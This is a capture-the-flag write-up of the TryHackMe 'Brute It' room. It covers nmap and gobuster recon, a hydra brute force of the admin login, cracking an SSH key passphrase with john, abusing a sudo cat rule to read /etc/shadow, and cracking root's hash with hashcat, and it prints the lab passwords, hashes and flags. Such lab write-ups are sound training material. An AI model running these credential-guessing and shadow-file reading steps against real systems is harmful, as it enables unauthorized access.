Brute It

Brute ItTryHackMe

Task 1: About this box

Deploy the machine

No answer needed

Task 2: Reconnaissance

Search for open ports using nmap. How many ports are open?

Let's perform a nmap scan against the machine.

$ nmap -sC -sV 10.10.30.186
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-07 08:43 IST
Nmap scan report for 10.10.30.186
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
|   256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_  256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.11 seconds

There are two open ports:

Port

Service

ssh

http

Answer

What version of SSH is running?

The answer is present in the nmap scan.

Answer

OpenSSH 7.6p1

What version of Apache is running?

The answer is in the nmap scan.

Answer

2.4.29

Which Linux distribution is running?

The answer is in the nmap scan.

Answer

Ubuntu

Search for hidden directories on web server. What is the hidden directory?

Let's brute force the web pages using gobuster.

$ gobuster dir -u http://10.10.30.186 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.30.186
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/admin                (Status: 301) [Size: 312] [--> http://10.10.30.186/admin/]
/index.html           (Status: 200) [Size: 10918]
/server-status        (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Answer

/admin

Task 2: Getting a shell

What is the user:password of the admin panel?

Let's go to the admin/ directory.

We can check the source code using CTRL+U.

Now that we know the username, we can use hydra to brute force the password.

$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.30.186 http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:F=username or password invalid"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-07 09:48:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.30.186:80/admin/index.php:user=^USER^&pass=^PASS^:F=username or password invalid
[80][http-post-form] host: 10.10.30.186   login: admin   password: xavier
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-07 09:49:25

Answer

admin:xavier

Crack the RSA key you found. What is John's RSA Private Key passphrase?>

Let's login with admin as the username and xavier as the password.

Let's download the RSA private key for the user john.

$ wget http://10.10.30.186/admin/panel/id_rsa
--2023-12-07 09:59:03--  http://10.10.30.186/admin/panel/id_rsa
Connecting to 10.10.30.186:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1766 (1.7K)
Saving to: ‘id_rsa’

id_rsa                                                     100%[========================================================================================================================================>]   1.72K  --.-KB/s    in 0s      

2023-12-07 09:59:04 (3.21 No error) - ‘id_rsa’ saved [1766/1766]

We can use ssh2john to create a hash file.

$ ssh2john id_rsa > id_hash

Now we can use john to crack the hashes.

$ john id_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockinroll       (id_rsa)     
1g 0:00:00:00 DONE (2023-12-07 10:04) 4.000g/s 290496p/s 290496c/s 290496C/s romeo23..renatito
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Answer

rockinroll

user.txt

Let's change the permissions of the id_rsa file.

$ chmod 700 id_rsa

Now that we know that the password for john is rockinroll, let's login through SSH.

$ ssh -i id_rsa john@10.10.30.186
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Dec  7 04:40:36 UTC 2023

  System load:  0.0                Processes:           102
  Usage of /:   25.7% of 19.56GB   Users logged in:     0
  Memory usage: 36%                IP address for eth0: 10.10.30.186
  Swap usage:   0%


63 packages can be updated.
0 updates are security updates.


Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106
john@bruteit:~$

Let's read the user.txt file.

john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt 
THM{a_password_is_not_a_barrier}

Answer

THM{a_password_is_not_a_barrier}

Web flag

The web flag was present on the page with the RSA private key.

THM{brut3_f0rce_is_e4sy}

Task 4: Privilege Escalation

Find a form to escalate your privileges. What is the root's password?

Let's check what sudo commands john has the permission to execute.

john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat

So we can run /bin/cat as an elevated user.
That means we can cat the /etc/shadow file.

john@bruteit:~$ sudo /bin/cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
thm:$6$hAlc6HXuBJHNjKzc$NPo/0/iuwh3.86PgaO97jTJJ/hmb0nPj8S/V6lZDsjUeszxFVZvuHsfcirm4zZ11IUqcoB9IEWYiCV.wcuzIZ.:18489:0:99999:7:::
sshd:*:18489:0:99999:7:::
john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7:::

We can tell that the root user's password is hashed using SHA-512 by the $6$ characters.
Let's save the root user's hash on our machine.

$ echo $6$zdk0jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6MJYPUTAaWu4infDjI88U9yUXEVgL > root_hash

We have to find the correct mode for SHA-512.

Let's run hashcat in order to crack this hash.

$ hashcat -a 0 -m 1800 root_hash.txt /usr/share/wordlists/rockyou.txt

Answer

football

root.txt

Let's switch to the root user.

john@bruteit:~$ su root
Password: 
root@bruteit:/home/john#

We can now read the root.txt file.

root@bruteit:/home/john# cd /root
root@bruteit:~# cat root.txt
THM{pr1v1l3g3_3sc4l4t10n}

Answer

THM{pr1v1l3g3_3sc4l4t10n}

Last updated 2 years ago

Was this helpful?